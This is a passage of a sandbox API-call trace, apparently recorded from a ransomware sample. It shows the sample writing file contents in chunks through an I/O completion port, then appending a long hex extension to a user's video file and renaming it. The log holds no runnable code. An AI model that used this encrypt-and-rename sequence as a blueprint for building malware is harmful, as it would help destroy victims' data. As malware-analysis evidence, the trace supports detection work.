nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0124.993] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.007] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.008] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.027] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.028] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.034] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.035] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.040] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.041] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.049] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.050] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.056] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.056] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.074] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x7600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.074] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.082] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x6600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.082] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.089] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.089] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.096] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.097] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.103] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.104] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.109] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 0x0 [0125.110] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.118] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.118] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.147] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.148] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.157] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.158] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.163] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.164] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.175] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.176] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.184] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.185] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.194] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.195] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.204] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.205] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.212] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.213] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.234] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.236] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.243] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.244] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.265] WriteFile (in: hFile=0x328, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.266] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.273] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.275] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.285] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.286] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.293] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.294] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.310] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.312] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.321] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.321] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.331] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.332] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.337] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.337] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.354] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.355] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.367] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.368] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.381] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.382] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.392] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.392] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.411] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.412] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.420] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.420] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.429] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x2c00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.430] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.436] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x3e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.437] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.443] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x1e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.443] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.449] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.450] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.457] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x7a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.457] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.463] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.464] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.472] WriteFile (in: hFile=0x31c, lpBuffer=0x3360140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008 | out: lpBuffer=0x3360140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3340008) returned 1 [0125.472] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.563] ReadFile (in: hFile=0x328, lpBuffer=0x338e098, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60 | out: lpBuffer=0x338e098*, lpNumberOfBytesRead=0x0, lpOverlapped=0x336df60) returned 1 [0125.563] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.569] NtQueryObject (in: Handle=0x33c, ObjectInformationClass=0x1, ObjectInformation=0x6703f0, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6703f0, ReturnLength=0x28fff70) returned 0x0 [0125.570] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi", lpString2=".956D942FD3F8AC1711D5307229229F197FFE4A50B9DE3C10AFB8F5B3F503167B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi.956D942FD3F8AC1711D5307229229F197FFE4A50B9DE3C10AFB8F5B3F503167B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\Videos\\TbZaiuKG9-TBnLK.avi.956D942FD3F8AC1711D5307229229F197FFE4A50B9DE3C10AFB8F5B3F503167B" [0125.570] GetProcessHeap () returned 0x600000 [0125.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x11e) returned 0x3118768 [0125.570] NtSetInformationFile (FileHandle=0x33c, IoStatusBlock=0x28fff60, FileInformation=0x3118768, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0125.571] CloseHandle (hObject=0x33c) returned 1 [0125.571] GetProcessHeap () returned 0x600000 [0125.571] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x670340 | out: hHeap=0x600000) returned 1 [0125.573] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0125.574] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, 